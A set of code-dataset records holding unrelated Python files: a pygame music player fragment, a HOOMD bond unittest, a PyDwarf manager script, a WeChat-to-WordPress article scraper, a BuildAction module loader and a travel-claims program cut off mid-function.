addPlaylist(self,song: str):\n if song in self.songs:\n self.playlist.append(song)\n if self.playable == False:\n self.playSong(str)\n self.playable = True\n return True\n return False\n\n def removePlaylist(self,song: str):\n if len(self.playlist) != 0:\n if song in self.playlist:\n pos = self.playlist.index(song)\n self.playlist.remove(song)\n if pos == self.pos:\n pygame.mixer.music.stop()\n self.offset = 0\n pygame.mixer.music.play(self.playlist[self.pos])\n if not self.playing:\n pygame.mixer.music.pause()\n return True\n\n def togglePlay(self):\n if self.playable:\n if self.play:\n pygame.mixer.music.pause()\n self.play = False\n else:\n pygame.mixer.music.unpause()\n self.play = True\n\n\n def skipAhead(self):\n if self.playable:\n if self.pos + 1 < len(self.playlist):\n self.pos += 1\n pygame.mixer.music.stop()\n pygame.mixer.music.play(self.playlist[self.pos])\n if not self.play:\n pygame.mixer.music.pause()\n\n\n def seek(self,pos: float):\n if self.songName is not None:\n self.playSong(self.songName)\n if not self.play:\n pygame.mixer.music.pause()\n self.offset = pos*1000\n\n\n","sub_path":"MusicApp.py","file_name":"MusicApp.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"305493634","text":"# -*- coding: iso-8859-1 -*-\n# Maintainer: joaander\n\nfrom hoomd import *\nfrom hoomd import md;\ncontext.initialize()\nimport unittest\nimport os\n\n# tests md.bond.harmonic\nclass bond_harmonic_tests (unittest.TestCase):\n def setUp(self):\n print\n self.s = init.read_gsd(os.path.join(os.path.dirname(__file__),'test_data_polymer_system.gsd'));\n context.current.sorter.set_params(grid=8)\n\n # test to see that se can create a md.force.constant\n def test_create(self):\n md.bond.harmonic();\n\n # test setting coefficients\n def test_set_coeff(self):\n harmonic = md.bond.harmonic();\n harmonic.bond_coeff.set('polymer', k=1.0, r0=1.0)\n all = group.all();\n md.integrate.mode_standard(dt=0.005);\n md.integrate.nve(all);\n run(100);\n\n # test coefficient not set checking\n def test_set_coeff_fail(self):\n harmonic = md.bond.harmonic();\n all = group.all();\n md.integrate.mode_standard(dt=0.005);\n md.integrate.nve(all);\n self.assertRaises(RuntimeError, run, 100);\n\n # test remove particle fails\n def test_bond_fail(self):\n harmonic = md.bond.harmonic();\n harmonic.bond_coeff.set('polymer', k=1.0, r0=1.0)\n all = group.all();\n md.integrate.mode_standard(dt=0.005);\n md.integrate.nve(all);\n # remove a particle\n del(self.s.particles[0])\n if comm.get_num_ranks() == 1:\n self.assertRaises(RuntimeError, run, 100);\n else:\n # in MPI simulations, we cannot check for an assertion during a simulation\n # the program will terminate with MPI_Abort\n #self.assertRaises(RuntimeError, run, 100);\n pass\n\n # test adding a dimer\n def test_add_dimer(self):\n harmonic = md.bond.harmonic();\n harmonic.bond_coeff.set('polymer', k=1.0, r0=1.0)\n all = group.all();\n md.integrate.mode_standard(dt=0.005);\n md.integrate.nve(all);\n t0 = self.s.particles.add('A')\n t1 = self.s.particles.add('B')\n self.s.bonds.add('polymer',t0,t1)\n run(100)\n\n # test exclusions in neighbor list\n def test_exclusions(self):\n harmonic = md.bond.harmonic();\n harmonic.bond_coeff.set('polymer', k=1.0, r0=1.0)\n nl = md.nlist.cell()\n lj = md.pair.lj(r_cut=3.0, nlist = nl)\n lj.pair_coeff.set('A', 'A', epsilon=1.0, sigma=1.0);\n lj.pair_coeff.set('A', 'B', epsilon=1.0, sigma=1.0);\n lj.pair_coeff.set('B', 'B', epsilon=1.0, sigma=1.0);\n all = group.all();\n md.integrate.mode_standard(dt=0.005);\n md.integrate.nve(all);\n run(100)\n\n self.assertEqual(nl.cpp_nlist.getNumExclusions(2), (17*100+2*10))\n self.assertEqual(nl.cpp_nlist.getNumExclusions(1), (2*100+2*10))\n\n # delete bonds connected to a particle\n tags = []\n for b in self.s.bonds:\n if b.a == 2 or b.b == 2:\n tags.append(b.tag)\n\n for t in tags:\n self.s.bonds.remove(t)\n\n # delete particle\n self.s.particles.remove(2)\n\n run(100)\n\n self.assertEqual(nl.cpp_nlist.getNumExclusions(2), (17*100+2*10)-3)\n self.assertEqual(nl.cpp_nlist.getNumExclusions(1), (2*100+2*10)+2)\n del nl\n del lj\n del harmonic\n\n def tearDown(self):\n del self.s\n context.initialize();\n\nif __name__ == '__main__':\n unittest.main(argv = ['test.py', '-v'])\n","sub_path":"hoomd/md/test-py/test_bond_harmonic.py","file_name":"test_bond_harmonic.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"128424713","text":"import re\nimport pydwarf\nfrom raws import *\nfrom settings import exportsettings as settings\nfrom utils import copytree\n\n# Actually run the program\ndef __main__():\n \n pydwarf.log.info('Running PyDwarf %s.' % pydwarf.__version__)\n if settings.dfversion is not None:\n pydwarf.log.info('Managing Dwarf Fortress version %s.' % settings.dfversion)\n else:\n pydwarf.log.error('No Dwarf Fortress version was specified in settings. Scripts will be run regardless of their indicated compatibility.')\n \n if os.path.exists(settings.rawsdir):\n \n if settings.backup and settings.backupdir:\n pydwarf.log.info('Backing up raws to %s...' % settings.backupdir)\n copytree(settings.rawsdir, settings.backupdir)\n else:\n pydwarf.log.warning('Proceeding without backing up raws.')\n \n pydwarf.log.info('Reading raws from %s...' % settings.rawsdir)\n r = raws().read(settings.rawsdir, pydwarf.log)\n \n pydwarf.log.info('Running scripts...')\n for script in settings.runscripts:\n pydwarf.log.debug('Handling script %s...' % script)\n \n urist = None\n scriptname = None\n scriptfunc = None\n scriptargs = None\n if isinstance(script, tuple) or isinstance(script, list):\n scriptargs = script[1]\n script = script[0]\n elif isinstance(script, dict):\n scriptname = script.get('name')\n scriptargs = script.get('args')\n scriptmatch = script.get('match')\n scriptignoreversion = script.get('ignore_df_version')\n checkversion = None if scriptignoreversion else settings.dfversion\n candidates = pydwarf.urist.get(scriptname, version=checkversion, match=scriptmatch)\n if candidates and len(candidates):\n urist = candidates[0]\n scriptname = urist.name\n if len(candidates) > 1: pydwarf.log.warning('More than one fitting script has been specified, using a best guess.') \n elif callable(script):\n scriptname = script.__name__\n scriptfunc = script\n else:\n scriptname = script\n candidates = pydwarf.urist.get(scriptname, version=settings.dfversion)\n if candidates and len(candidates):\n urist = candidates[0]\n scriptname = urist.name\n if len(candidates) > 1: pydwarf.log.warning('More than one fitting script has been specified, using a best guess.')\n if urist and scriptfunc is None:\n scriptfunc = urist.fn\n \n if scriptfunc:\n scriptinfo = 'Running script %s' % scriptname\n if scriptargs: scriptinfo = '%s with args %s' % (scriptinfo, scriptargs)\n pydwarf.log.info('%s...' % scriptinfo)\n \n try:\n response = scriptfunc(r, **scriptargs) if scriptargs else scriptfunc(r)\n if response:\n success = response.get('success')\n status = response['status'] if 'status' in response else ('Script %s ran %ssuccessfully.' % (scriptname, '' if success else 'un'))\n pydwarf.log.info('%s: %s' % ('SUCCESS' if success else 'FAILURE', status))\n else:\n pydwarf.log.error('Received no response from script %s.' % scriptname)\n except Exception:\n pydwarf.log.exception('Unhandled exception while running script %s.' % scriptname)\n else:\n pydwarf.log.info('Finished running script %s.' % scriptname)\n\n else:\n pydwarf.log.error('Failed to retrieve script %s.' % scriptname)\n \n outputdir = settings.outputdir if settings.outputdir else settings.rawsdir\n pydwarf.log.info('Writing changes to raws to %s...' % outputdir)\n if not os.path.exists(outputdir): os.makedirs(outputdir)\n r.write(outputdir, pydwarf.log)\n \n pydwarf.log.info('All done!')\n \n else:\n pydwarf.log.info('Specified raws directory does not exist.')\n\nif __name__ == \"__main__\":\n __main__()\n","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"306649830","text":"# -*- coding: utf-8 -*-\r\n\r\nimport json\r\nimport urllib.request as urllib2\r\nfrom bs4 import BeautifulSoup\r\nimport mysql\r\nimport datetime\r\nimport numpy as np\r\n\r\nresult_json_file = 'result_170816.json'\r\nwith open(result_json_file, 'r') as f:\r\n data = json.load(f)\r\n\r\nconnection = mysql.mysql_ctrl()\r\n# 使用 cursor() 方法创建一个游标对象 cursor\r\ncursor = connection.cursor()\r\n\r\n# 列出用户表\r\ncursor.execute('select id,user_login from wp_users')\r\nauthors = list(cursor.fetchall())\r\n\r\n# 列出最大 post_author_id\r\ncursor.execute('select max(id) from wp_users')\r\nmax_user_id = cursor.fetchall()[0][0]\r\n\r\n# 列出最大 post_id\r\ncursor.execute('select max(id) from wp_posts')\r\nmax_post_id = cursor.fetchall()[0][0]\r\nif max_post_id is None:\r\n max_post_id = 0\r\n\r\n# 列出现有文章的微信url\r\ncursor.execute('select guid from wp_posts where guid like \"http://mp.weixin.qq.com/%\"')\r\npost_url = list(cursor.fetchall())\r\n\r\n# 初始化一些变量\r\npost_author_id = 0\r\npost_id = max_post_id\r\n\r\n#for i in range(0, 1):\r\nfor i in range(0, len(data)):\r\n # 读取 Json\r\n url = data[i]['url']\r\n cover_image_url = data[i]['cover_image_url']\r\n digest = data[i]['digest']\r\n source_url = data[i]['source_url']\r\n title = data[i]['title']\r\n category = data[i]['category']\r\n\r\n # 判断是否已存在文章\r\n if np.in1d(url, post_url):\r\n print(str(i) + ':文章已存在,跳过')\r\n continue\r\n\r\n # 爬取内容\r\n headers = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) '\\\r\n 'Gecko/20091201 Firefox/3.5.6'}\r\n try:\r\n req = urllib2.Request(url, headers=headers)\r\n except:\r\n print('----------读取URL失败,跳到下一条----------')\r\n continue\r\n content = urllib2.urlopen(req).read()\r\n soup = BeautifulSoup(content, 'html.parser')\r\n\r\n try:\r\n post_date = soup.find('em', {'id': 'post-date'}).string.strip()\r\n except:\r\n print('----------找不到元素,可能文章被屏蔽----------')\r\n continue\r\n\r\n description = \"暂无详细信息\"\r\n try:\r\n description = soup.find('div', {'id': 'js_profile_qrcode'})\\\r\n .find('div', {'class': 'profile_inner'})\\\r\n .findAll('p', {'class':'profile_meta'})[1]\\\r\n .find('span', {'class':'profile_meta_value'}).string.strip()\r\n except:\r\n print('----------找不到公众号描述信息----------')\r\n\r\n all_date = datetime.datetime.strptime(post_date, \"%Y-%m-%d\")\r\n post_author_name = soup.find('a',{'id': 'post-user'}).string.strip() #公众号名称\r\n try:\r\n wechat_id = soup.find('div',{'id': 'js_profile_qrcode'})\\\r\n .find('div',{'class': 'profile_inner'})\\\r\n .findAll('p',{'class':'profile_meta'})[0]\\\r\n .find('span',{'class':'profile_meta_value'}).string.strip()\r\n user_nicename = wechat_id\r\n except:\r\n wechat_id = post_author_name\r\n user_nicename = ''\r\n\r\n # 判断公众号是否存在于 wp_users\r\n new_author = 'yes'\r\n for a in authors:\r\n # 如果存在就获取 id\r\n if a[1] == wechat_id:\r\n post_author_id = a[0]\r\n new_author = 'no'\r\n\r\n # 如果不存在就寻找最大id然后增加一位,写入 wp_users 表\r\n if new_author == 'yes':\r\n add_author_sql = '''INSERT INTO wp_users \r\n (id,user_login,user_pass,user_nicename,user_registered,display_name)\r\n VALUES (%s,%s,%s,%s,%s,%s)'''\r\n post_author_id = max_user_id + 1\r\n max_user_id = post_author_id\r\n if user_nicename == '':\r\n user_nicename = str(post_author_id)\r\n user_registered = datetime.datetime.now().strftime('%Y-%m-%d')\r\n add_author_value = [post_author_id,wechat_id,'$P$BNVjZktJh7.E2nhYoEjn4RS4.rfdML/',user_nicename,user_registered,post_author_name]\r\n # 执行sql语句\r\n cursor.execute(add_author_sql,add_author_value)\r\n # 提交到数据库执行 \r\n connection.commit()\r\n # 把新增用户加入元组\r\n authors.append((post_author_id,wechat_id))\r\n\r\n # 新增账号描述\r\n add_description_sql = 'INSERT INTO wp_usermeta (user_id,meta_key,meta_value) VALUES (%s,%s,%s)'\r\n add_description_value = [post_author_id,'description',description]\r\n cursor.execute(add_description_sql,add_description_value)\r\n connection.commit()\r\n\r\n print(\"----------新增作者:\" + wechat_id + ':' + description + '----------')\r\n\r\n\r\n # 正文处理\r\n post_content = ''\r\n for child in soup.find('div',{'id': 'js_content'}).children:\r\n post_content = post_content + str(child)\r\n soup_post_content = BeautifulSoup(post_content, 'html.parser')\r\n for image in soup_post_content.findAll('img',{'data-src':True}):\r\n data_src = image['data-src']\r\n image['src'] = data_src\r\n post_content = str(soup_post_content)\r\n url_prefix = 'http://read.html5.qq.com/image?src=forum&q=5&r=0&imgflag=7&imageUrl='\r\n post_content.replace('http://mmbiz.qpic.cn/', url_prefix + 'http://mmbiz.qpic.cn/')\r\n \r\n # 写入数据库\r\n post_id = post_id + 1\r\n post_author = post_author_id\r\n post_date = all_date\r\n post_date_gmt = all_date\r\n post_title = soup.find('h2', {'id': 'activity-name'}).string.strip()\r\n post_excerpt = digest\r\n post_status = 'publish'\r\n comment_status = 'open'\r\n ping_status = 'open'\r\n post_password = ''\r\n post_name = ''\r\n to_ping = ''\r\n pinged = ''\r\n post_modified = all_date\r\n post_modified_gmt = all_date\r\n post_content_filtered = ''\r\n post_parent = 0\r\n guid = url\r\n menu_order = 0\r\n post_type = 'post'\r\n post_mime_type = ''\r\n comment_count = 0\r\n\r\n add_wp_posts = '''INSERT INTO wp_posts(\r\n id,\r\n post_author,\r\n post_date,\r\n post_date_gmt,\r\n post_content,\r\n post_title,\r\n post_excerpt,\r\n post_status,\r\n comment_status,\r\n ping_status,\r\n post_password,\r\n post_name,\r\n to_ping,\r\n pinged,\r\n post_modified,\r\n post_modified_gmt,\r\n post_content_filtered,\r\n post_parent,\r\n guid,\r\n menu_order,\r\n post_type,\r\n post_mime_type,\r\n comment_count\r\n )\r\n VALUES \r\n (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'''\r\n\r\n add_value = [\r\n post_id,\r\n post_author,\r\n post_date,\r\n post_date_gmt,\r\n post_content,\r\n post_title,\r\n post_excerpt,\r\n post_status,\r\n comment_status,\r\n ping_status,\r\n post_password,\r\n post_name,\r\n to_ping,\r\n pinged,\r\n post_modified,\r\n post_modified_gmt,\r\n post_content_filtered,\r\n post_parent,\r\n guid,\r\n menu_order,\r\n post_type,\r\n post_mime_type,\r\n comment_count\r\n ]\r\n cursor.execute(add_wp_posts,add_value)\r\n connection.commit()\r\n\r\n # 添加类别\r\n add_wp_term = 'INSERT INTO wp_term_relationships(object_id, term_taxonomy_id, term_order) VALUES (%s,%s,%s)'\r\n wp_term_value = [post_id,category,0]\r\n cursor.execute(add_wp_term,wp_term_value)\r\n update_category_count = 'UPDATE wp_term_taxonomy SET count=count+1 WHERE term_taxonomy_id = %s'\r\n cursor.execute(update_category_count,category)\r\n connection.commit()\r\n\r\n # 插入图片,guid 关联 cover_image_url\r\n post_id = post_id + 1\r\n post_author = post_author_id\r\n post_date = all_date\r\n post_date_gmt = all_date\r\n post_content = ''\r\n post_title = '1'\r\n post_excerpt = ''\r\n post_status = 'inherit'\r\n comment_status = 'open'\r\n ping_status = 'closed'\r\n post_password = ''\r\n post_name = '1'\r\n to_ping = ''\r\n pinged = ''\r\n post_modified = all_date\r\n post_modified_gmt = all_date\r\n post_content_filtered = ''\r\n post_parent = 0\r\n guid = url_prefix + cover_image_url\r\n menu_order = 0\r\n post_type = 'attachment'\r\n post_mime_type = 'image/jpeg'\r\n comment_count = 0\r\n\r\n cover_image_value = [\r\n post_id,\r\n post_author,\r\n post_date,\r\n post_date_gmt,\r\n post_content,\r\n post_title,\r\n post_excerpt,\r\n post_status,\r\n comment_status,\r\n ping_status,\r\n post_password,\r\n post_name,\r\n to_ping,\r\n pinged,\r\n post_modified,\r\n post_modified_gmt,\r\n post_content_filtered,\r\n post_parent,\r\n guid,\r\n menu_order,\r\n post_type,\r\n post_mime_type,\r\n comment_count\r\n ]\r\n cursor.execute(add_wp_posts,cover_image_value)\r\n connection.commit()\r\n\r\n # 在 wp_postmeta 关联图片和文章\r\n add_wp_postmeta = 'insert into wp_postmeta (post_id,meta_key,meta_value) values (%s,%s,%s)'\r\n postmeta_value = [post_id,'_wp_attached_file',url_prefix + cover_image_url]\r\n cursor.execute(add_wp_postmeta,postmeta_value)\r\n\r\n add_wp_postmeta = 'insert into wp_postmeta (post_id,meta_key,meta_value) values (%s,%s,%s)'\r\n postmeta_value = [post_id-1,'_thumbnail_id',post_id]\r\n cursor.execute(add_wp_postmeta,postmeta_value)\r\n\r\n connection.commit()\r\n\r\n print('写入第'+ str(i) +'篇文章')\r\n\r\n# 关闭数据库连接\r\nconnection.close()","sub_path":"data/json/wechat.py","file_name":"wechat.py","file_ext":"py","file_size_in_byte":9306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"521815699","text":"\nimport sys\nimport os\nimport logging\nimport importlib\nfrom fnmatch import fnmatch\nimport pulse.vendor.yaml as yaml\n\nfrom . import core\n\n\n__all__ = [\n 'BuildActionLoader',\n]\n\nLOG = logging.getLogger(__name__)\n\n\ndef _isSamePythonFile(fileA, fileB):\n return (os.path.normpath(os.path.splitext(fileA)[0]) ==\n os.path.normpath(os.path.splitext(fileB)[0]))\n\n\nclass BuildActionLoader(object):\n\n def loadActionConfig(self, name, configFile):\n \"\"\"\n Load and return the config data for a BuildAction class.\n\n Args:\n name (str): The name of the BuildAction for which to load a config\n configFile (str): The path to the BuildAction config file\n\n Returns:\n A dict representing the config data for the named BuildAction\n \"\"\"\n if not os.path.isfile(configFile):\n LOG.warning(\"Config file not found: {0}\".format(configFile))\n return False\n\n with open(configFile, 'rb') as fp:\n config = yaml.load(fp.read())\n\n if config and (name in config):\n actionConfig = config[name]\n actionConfig['configFile'] = configFile\n return actionConfig\n\n LOG.warning(\"No BuildAction config data for {0} \"\n \"was found in {1}\".format(name, configFile))\n\n def loadActionsFromModule(self, module):\n \"\"\"\n Return BuildStep type map data for all BuildActions\n contained in the given module\n\n Returns:\n A list of tuples containing (dict, class) representing the\n action's config and BuildAction class.\n\n \"\"\"\n result = []\n for name in dir(module):\n obj = getattr(module, name)\n if (isinstance(obj, type) and issubclass(obj, core.BuildAction) and\n obj is not core.BuildAction):\n # get config for the action class\n actionName = obj.__name__\n configFile = os.path.splitext(module.__file__)[0] + '.yaml'\n actionConfig = self.loadActionConfig(name, configFile)\n if actionConfig:\n LOG.debug('Loaded BuildAction: {0}'.format(obj.__name__))\n result.append((actionConfig, obj))\n else:\n LOG.error('Failed to load BuildAction: {0}'.format(\n obj.getTypeName()))\n return result\n\n def loadActionsFromDirectory(self, startDir, pattern='*_pulseaction.py'):\n \"\"\"\n Return BuildStep type map data for all BuildActions found\n by searching a directory. Search is performed recursively for\n any python files matching a pattern.\n\n Args:\n startDir: A str path of the directory to search\n\n Returns:\n A list of tuples containing (dict, class) representing the\n action's config and BuildAction class.\n \"\"\"\n if '~' in startDir:\n startDir = os.path.expanduser(startDir)\n\n result = []\n\n paths = os.listdir(startDir)\n for path in paths:\n fullPath = os.path.join(startDir, path)\n\n if os.path.isfile(fullPath):\n if fnmatch(path, pattern):\n module = self._getModuleFromFile(fullPath)\n result.extend(self.loadActionsFromModule(module))\n\n elif os.path.isdir(fullPath):\n result.extend(self.loadActionsFromDirectory(fullPath, pattern))\n\n return result\n\n def _getModuleFromFile(self, filePath):\n # get module name\n name = os.path.splitext(os.path.basename(filePath))[0]\n # check for existing module in sys.modules\n if name in sys.modules:\n if _isSamePythonFile(sys.modules[name].__file__, filePath):\n # correct module already imported, delete it to force reload\n del sys.modules[name]\n else:\n raise ImportError(\"BuildAction module does not have \"\n \"a unique module name: \" + filePath)\n # add dir to sys path if necessary\n dirName = os.path.dirname(filePath)\n isNotInSysPath = False\n if not dirName in sys.path:\n sys.path.insert(0, dirName)\n isNotInSysPath = True\n module = importlib.import_module(name)\n # remove path from sys\n if isNotInSysPath:\n sys.path.remove(dirName)\n return module\n","sub_path":"src/pulse/scripts/pulse/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":4448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"434204387","text":"# Sprint Week 2!\n\n# Author: Evan Murphy & Stephen Menecola\n\n# Date: 03/12/21\n\nimport Backpack as BP\nfrom datetime import datetime\nCurDate = datetime.now()\n\nClaimNumber = 0\nHST = 0.15\nLowPerDiemRate = 85.00\nHighPerDiemRate = 100\nMileageRate = 0.10\nRentalCarRate = 56\n\n# Reads and initialises from Deflt.dat file\n\nfile = open('Deflt.dat', 'r')\nClaimNumber = int(file.readline())\nHST = float(file.readline())\nLowPerDiemRate = int(file.readline())\nHighPerDiemRate = int(file.readline())\nMileageRate = float(file.readline())\nRentalCarRate = int(file.readline())\nfile.close()\n\n\n# This function will process salesperson travel claims\ndef TravelClaim(ClaimNumber):\n while True:\n EmployeeNumber = BP.ValidEmployeeNumber9()\n EmployeeName = input(\"Enter employee name: \")\n TripLocation = input(\"Enter location of travel: \")\n\n # Format the dates to allow them to be subtracted****\n\n # newdate1 = time.strptime(date1, \"%d/%m/%Y\") and newdate2 = time.strptime(date2, \"%d/%m/%Y\")\n StartDatestr = input(\"Business trip start date (yyyy-mm-dd): \")\n EndDatestr = input(\"Business trip end date (yyyy-mm-dd): \")\n # formats start & end dates without time, and calculates travel days\n StartDate, EndDate, TotalTravelDays = BP.ProcessDate(StartDatestr, EndDatestr)\n\n OwnOrRented = input(\"Was the vehicle owned or rented? (O/R): \")\n TotalKilometers = int(input(\"Enter the total kilometers travelled: \"))\n\n if TotalTravelDays <= 3:\n PerDiem = TotalTravelDays * 85.00\n else:\n PerDiem = TotalTravelDays * 100.00\n\n if OwnOrRented.upper() == \"O\":\n MileageAmount = TotalKilometers * 0.10\n elif OwnOrRented.upper() == \"R\":\n MileageAmount = TotalTravelDays * 56.00\n else:\n MileageAmount = 0\n\n ClaimAmount = PerDiem + MileageAmount\n TaxAmount = PerDiem * HST\n ClaimTotal = ClaimAmount + TaxAmount\n\n # Formatting\n\n #PerDiemStr = \"${:,.2f}\".format(PerDiem)\n #MileageAmountStr = \"${:,.2f}\".format(MileageAmount)\n #ClaimAmountStr = \"${:,.2f}\".format(ClaimAmount)\n TaxAmountStr = \"${:,.2f}\".format(TaxAmount)\n ClaimTotalStr = \"${:,.2f}\".format(ClaimTotal)\n\n\n # Printing results\n\n print()\n print(\" NL Chocolate Company - Travel Claim\")\n print()\n print(\"*\" * 60)\n print()\n print(\"Employee Number: {} Employee Name: {:<12}\".format(EmployeeNumber, EmployeeName))\n print()\n print(\"Travel location: {}\".format(TripLocation))\n print(\"Travel Start Date: {} Travel End Date: {}\".format(StartDate, EndDate))\n print()\n print(\"Total Days Travelled: {}\".format(TotalTravelDays))\n print(\"Car Status (Owned or Rented): {}\".format(OwnOrRented))\n print(\"Total Kilometers Travelled: {}\".format(TotalKilometers))\n print()\n print(\"*\" * 60)\n print()\n print(\"Daily Cost: ${:,.2f}\".format(PerDiem))\n print(\"Mileage Cost: ${:,.2f}\".format(MileageAmount))\n print(\"Claim Amount: ${:,.2f}\".format(ClaimAmount))\n print(\"Tax Amount: {:<10}\".format(TaxAmountStr))\n print(\" ----------\")\n print(\"Claim Total: {:<10}\".format(ClaimTotalStr))\n print()\n print(\"\")\n\n file = open('Claims.dat', 'a')\n\n file.write(\"{}, \".format(ClaimNumber))\n file.write(\"{}, \".format(EmployeeNumber))\n file.write(\"{}, \".format(EmployeeName))\n file.write(\"{}, \".format(TripLocation))\n file.write(\"{}, \".format(StartDate))\n file.write(\"{}, \".format(EndDate))\n file.write(\"{}, \".format(TotalTravelDays))\n file.write(\"{}, \".format(OwnOrRented))\n file.write(\"{}, \".format(TotalKilometers))\n file.write(\"{}, \".format(PerDiem))\n file.write(\"{}, \".format(MileageAmount))\n file.write(\"{}, \".format(ClaimAmount))\n file.write(\"{}, \".format(TaxAmount))\n file.write(\"{}\\n\".format(ClaimTotal))\n\n file.close()\n\n # Increase claim number\n ClaimNumber += 1\n\n # Updates Deflt.dat with new claim number\n file = open('Deflt.dat', 'w')\n file.write(\"{}\\n\".format(str(ClaimNumber)))\n file.write(\"{}\\n\".format(str(HST)))\n file.write(\"{}\\n\".format(str(LowPerDiemRate)))\n file.write(\"{}\\n\".format(str(HighPerDiemRate)))\n file.write(\"{}\\n\".format(float(MileageRate)))\n file.write(\"{}\\n\".format(int(RentalCarRate)))\n file.close()\n\n print(\"Claim processed successfully\")\n print()\n\n Continue = input(\"Process another data claim? (Enter Y for yes or any other key to end): \")\n if Continue.upper() != \"Y\":\n break\n\n Anykey = input(\"Press any key to continue.\")\n\n\n# This function will allow the user to edit the system default values\ndef EditDefaultValues():\n\n # Open the defaults file and read the values into variables\n f = open('Deflt.dat', 'r')\n ClaimNumber = int(f.readline())\n HSTRate = float(f.readline())\n LowPerDiemRate = int(f.readline())\n HighPerDiemRate = int(f.readline())\n MileageRate = float(f.readline())\n RentalCarRate = int(f.readline())\n f.close()\n\n print(\"NL Chocolate Company\")\n print(\"Edit Default Values\")\n print()\n print(\"For each value, enter an updated value, \")\n print(\"or press Enter to keep the existing value.\")\n print(\"Current value is shown in ().\")\n print()\n\n NewClaimNumber = input(\"Enter the claim number (\" + str(ClaimNumber) + \"): \")\n if NewClaimNumber == \"\":\n NewClaimNumber = ClaimNumber\n\n NewHSTRate = input(\"Enter the HSTRate (\" + str(HSTRate) + \"): \")\n if NewHSTRate == \"\":\n NewHSTRate = HSTRate\n\n NewLowPerDiemRate = input(\"Enter the low per diem rate (\" + str(LowPerDiemRate) + \"): \")\n if NewLowPerDiemRate == \"\":\n NewLowPerDiemRate = LowPerDiemRate\n\n NewHighPerDiemRate = input(\"Enter the high per diem rate (\" + str(HighPerDiemRate) + \"): \")\n if NewHighPerDiemRate == \"\":\n NewHighPerDiemRate = HighPerDiemRate\n\n NewMileageRate = input(\"Enter the new mileage rate (\" + str(MileageRate) + \"): \")\n if NewMileageRate == \"\":\n NewMileageRate = MileageRate\n\n NewRentalCarRate = input(\"Enter the rental care rate (\" + str(RentalCarRate) + \"): \")\n if NewRentalCarRate == \"\":\n NewRentalCarRate = RentalCarRate\n\n f = open('Deflt.dat', 'w')\n f.write(\"{}\\n\".format(str(NewClaimNumber)))\n f.write(\"{}\\n\".format(str(NewHSTRate)))\n f.write(\"{}\\n\".format(str(NewLowPerDiemRate)))\n f.write(\"{}\\n\".format(str(NewHighPerDiemRate)))\n f.write(\"{}\\n\".format(str(NewMileageRate)))\n f.write(\"{}\\n\".format(str(NewRentalCarRate)))\n f.close()\n\n print()\n print(\"Default values successfully updated\")\n\n Anykey = input(\"Press any key to continue.\")\n\n\n# This function will allow the user to print a travel report\ndef PrintTravelReport():\n while True:\n\n print()\n print(\" 1 2 3 4 5 6 7 8\")\n print(\"1234567890\" * 8)\n print()\n print(\" NL Chocolate Company\")\n print()\n print(\" Travel Claims Listing as of {}\".format(CurDate.strftime(\"%m/%d/%Y\")))\n print()\n print(\"Claim Claim Salesperson Claim Per Diem Mileage Claim\")\n print(\"Number Date Name Location Amount Amount Amount\")\n print(\"=\" * 86)\n\n file = open('Claims.dat', 'r')\n\n ClaimCounter = 0\n PerDiemAccumulator = 0\n MileageAccumulator = 0\n ClaimAmountAccumulator = 0\n\n for claims in file:\n ClaimList = claims.split(\",\")\n ClaimNumber = ClaimList[0]\n ClaimDate = ClaimList[4].strip()\n Salesperson = ClaimList[2].strip()\n ClaimLocation = ClaimList[3].strip()\n PerDiemAmount = float(ClaimList[9].strip())\n MileageAmount = float(ClaimList[10].strip())\n ClaimAmount = float(ClaimList[11].strip())\n\n print(\"{:<3} {:<10} {:<12} {:<12} ${:,.2f} ${:,.2f} ${:,.2f}\".format(ClaimNumber, ClaimDate, Salesperson, ClaimLocation, PerDiemAmount, MileageAmount, ClaimAmount))\n\n ClaimCounter += 1\n PerDiemAccumulator += PerDiemAmount\n MileageAccumulator += MileageAmount\n ClaimAmountAccumulator += ClaimAmount\n\n\n print(\"=\"*86)\n print(\"{} claims listed ${:,.2f} ${:,.2f} ${:,.2f}\".format(ClaimCounter, PerDiemAccumulator, MileageAccumulator, ClaimAmountAccumulator))\n print()\n print(\" End of Report\")\n file.close()\n break\n\n Anykey = input(\"Press any key to continue.\")\n\n\n# This function will allow the user to graph monthly claim totals\ndef GraphClaimTotals():\n\n import numpy as np\n import matplotlib.pyplot as plt\n\n Jan = 0\n Feb = 0\n Mar = 0\n Apr = 0\n May = 0\n Jun = 0\n Jul = 0\n Aug = 0\n Sep = 0\n Oct = 0\n Nov = 0\n Dec = 0\n\n file = open(\"Claims.dat\", \"r\")\n\n for claims in file:\n ClaimList = claims.split(\",\")\n StartDate = ClaimList[4].strip()\n StartDate2 = StartDate.split('-')\n Month = StartDate2[1]\n ClaimAmount = float(ClaimList[11].strip())\n if Month == \"01\":\n Jan = Jan + ClaimAmount\n elif Month == \"02\":\n Feb = Feb + ClaimAmount\n elif Month == \"03\":\n Mar = Mar + ClaimAmount\n elif Month == \"04\":\n Apr = Apr + ClaimAmount\n elif Month == \"05\":\n May = May + ClaimAmount\n elif Month == \"06\":\n Jun = Jun + ClaimAmount\n elif Month == \"07\":\n Jul = Jul + ClaimAmount\n elif Month == \"08\":\n Aug = Aug + ClaimAmount\n elif Month == \"09\":\n Sep = Sep + ClaimAmount\n elif Month == \"10\":\n Oct = Oct + ClaimAmount\n elif Month == \"11\":\n Nov = Nov + ClaimAmount\n elif Month == \"12\":\n Dec = Dec + ClaimAmount\n\n XAxis = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n YAxis = [Jan, Feb, Mar, Apr, May, Jun, Jul, Aug, Sep, Oct, Nov, Dec]\n\n plt.plot(XAxis, YAxis)\n\n plt.xlabel('Month')\n 